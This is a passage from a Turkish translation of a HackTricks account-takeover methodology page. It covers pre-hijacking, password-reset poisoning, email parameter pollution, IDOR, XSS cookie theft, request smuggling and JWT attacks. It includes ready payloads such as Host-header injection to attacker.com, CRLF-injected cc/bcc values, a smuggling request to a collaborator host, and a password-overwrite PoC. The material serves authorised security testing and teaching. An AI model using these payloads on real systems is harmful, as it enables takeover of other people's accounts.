def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: aynı geçerli OTP'yi iki oturumda eşzamanlı gönderin; bazen bir oturum doğrulanmış saldırgan hesabı olurken kurban akışı da başarılı olur.
- Ayrıca verification links üzerinde Host header poisoning'i test edin (same as reset poisoning below) to leak or complete verification on attacker controlled host.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (kurban kaydolmadan önce)

Güçlü bir sorun sınıfı, saldırganın kurbanın e‑postasında kurban hesap oluşturmadan önce eylemler gerçekleştirdiği ve daha sonra erişimi geri kazandığı durumlarda ortaya çıkar.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
- Attacker: kurban e‑postasıyla klasik bir hesap kaydeder ve bir parola belirler
- Victim: daha sonra aynı e‑posta ile SSO ile kaydolur
- Insecure merges may leave both parties logged in or resurrect the attacker’s access
- Unexpired Session Identifier
- Attacker: hesap oluşturur ve uzun‑süreli bir oturum tutar (çıkış yapmayın)
- Victim: şifreyi kurtarır/ayarlar ve hesabı kullanır
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: önceden oluşturulmuş hesaba ikincil bir tanımlayıcı ekler (phone, additional email, or links attacker’s IdP)
- Victim: şifreyi sıfırlar; attacker daha sonra the trojan identifier'ı kullanarak sıfırlama/giriş yapar
- Unexpired Email Change
- Attacker: email‑change işlemini attacker mail adresine başlatır ve onayı bekletir
- Victim: hesabı kurtarır ve kullanmaya başlar
- Attacker: daha sonra pending email‑change'i tamamlayarak hesabı çalar
- Non‑Verifying IdP
- Attacker: email sahipliğini doğrulamayan bir IdP kullanarak `victim@…` iddiasında bulunur
- Victim: klasik yol ile kaydolur
- Service merges on email without checking `email_verified` or performing local verification

Practical tips

- Web/mobile bundle'larından akışları ve endpoint'leri toplayın. Klasik signup, SSO linking, email/phone change ve password reset endpoint'lerini arayın.
- Diğer akışları denerken oturumları canlı tutmak için gerçekçi otomasyon oluşturun.
- SSO testleri için bir test OIDC provider ayağa kaldırın ve RP'nin doğrulanmamış IdP'lere güvenip güvenmediğini kontrol etmek için kurban adresi için `email` claim'leri ve `email_verified=false` ile tokenlar verin.
- Herhangi bir password reset veya email değişikliğinden sonra doğrulayın ki:
- tüm diğer oturumlar ve tokenlar invalidated olsun,
- pending email/phone change yetenekleri iptal edilmiş olsun,
- daha önce bağlı olan IdP'ler/e‑postalar/telefonlar tekrar re‑verified olsun.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Kendi e‑posta adresinize password reset isteği gönderin
2. Password reset linkine tıklayın
3. Şifreyi değiştirmeyin
4. Herhangi bir 3rd party siteye tıklayın (ör. Facebook, twitter)
5. İsteği Burp Suite proxy'de intercept edin
6. Referer header'ın password reset token'ı leaking edip etmediğini kontrol edin.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Burp Suite'te password reset isteğini intercept edin
2. Burp Suite'te aşağıdaki header'ları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Değiştirilmiş header ile isteği iletin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host header_ bazlı bir password reset URL'si arayın, örn: `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

API Parametrelerinde IDOR

1. Saldırgan kendi hesabıyla giriş yapıp Change password özelliğine gitmelidir.
2. Burp Suite’i başlatın ve isteği Intercept edin
3. Repeater sekmesine gönderin ve parametreleri düzenleyin : Kullanıcı ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Zayıf Parola Sıfırlama Tokenı

Parola sıfırlama tokenı her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.
Tokenın süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın; bazı durumlarda üretim algoritması zayıftır ve tahmin edilebilir. Algoritmada aşağıdaki değişkenler kullanılabilir.

• Timestamp
• UserID
• Kullanıcının e-posta adresi
• Ad ve Soyad
• Doğum tarihi
• Kriptografi
• Sadece rakam
• Kısa token dizisi ( karakterler arasında [A-Z,a-z,0-9])
• Token yeniden kullanımı
• Token’ın sona erme tarihi

Parola Sıfırlama Token Sızıntısı

1. Belirli bir e-posta için API/UI üzerinden parola sıfırlama isteği tetikleyin, örn: test@mail.com
2. Sunucu yanıtını inceleyin ve resetToken’ı kontrol edin
3. Ardından token’ı şu gibi bir URL’de kullanın: https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Kullanıcı Adı Çakışmasıyla Parola Sıfırlama

1. Mağdurun kullanıcı adıyla tamamen aynı ama kullanıcı adının önüne ve/veya sonuna boşluk karakterleri eklenmiş bir kullanıcı adıyla sisteme kayıt olun. Örn: "admin "
2. Kötü amaçlı kullanıcı adınızla parola sıfırlama isteği gönderin.
3. E-postanıza gönderilen token’ı kullanıp mağdurun parolasını sıfırlayın.
4. Yeni parolayla mağdur hesabına giriş yapın.

CTFd platformu bu saldırıya karşı zayıftı.
See: CVE-2020-7245

Cross Site Scripting ile Hesap Ele Geçirme

1. Uygulama içinde veya çerezler ana domain’e scoped ise alt bir domainde XSS bulun : *.domain.com
2. Leak the current sessions cookie
3. Cookie’yi kullanarak kullanıcı olarak oturum açın

HTTP Request Smuggling ile Hesap Ele Geçirme

1. HTTP Request Smuggling türünü (CL, TE, CL.TE) tespit etmek için smuggler’ı kullanın
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. POST / HTTP/1.1’i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:
   GET http://something.burpcollaborator.net HTTP/1.1 X: amacı kurbanları burpcollab’a open redirect ile yönlendirmek ve cookie’lerini çalmaktır\
3. Nihai istek aşağıdakine benzer olabilir

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone raporları bu hatanın sömürüldüğünü bildiriyor\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Account Takeover via CSRF

1. CSRF için bir payload oluşturun, örn: “HTML form with auto submit for a password change”
2. Payload’ı gönderin

Account Takeover via JWT

JSON Web Token bir kullanıcının kimlik doğrulamasında kullanılabilir.

• Başka bir User ID / Email ile JWT’yi düzenleyin
• Zayıf JWT imzası olup olmadığını kontrol edin

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Bazı signup handler’ları, sağlanan email zaten mevcutsa upsert yapar. Eğer endpoint, email ve password içeren minimal bir body kabul ediyor ve sahiplik doğrulaması uygulamıyorsa, mağdurun email’ini göndererek parolalarını pre-auth olarak üzerine yazabilirsiniz.

• Keşif: bundled JS’ten (veya mobile app trafiğinden) endpoint isimlerini toplayın, sonra ffuf/dirsearch kullanarak /parents/application/v4/admin/FUZZ gibi base path’leri fuzz’layın.
• Yöntem ipuçları: bir GET’in “Only POST request is allowed.” gibi mesajlar döndürmesi genellikle doğru HTTP verb’ünü ve JSON body beklendiğini gösterir.
• Gerçek dünyada gözlemlenen minimal body:

{"email":"victim@example.com","password":"New@12345"}

Örnek PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Etkisi: Full Account Takeover (ATO) reset token, OTP veya email verification olmadan.

Referanslar

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.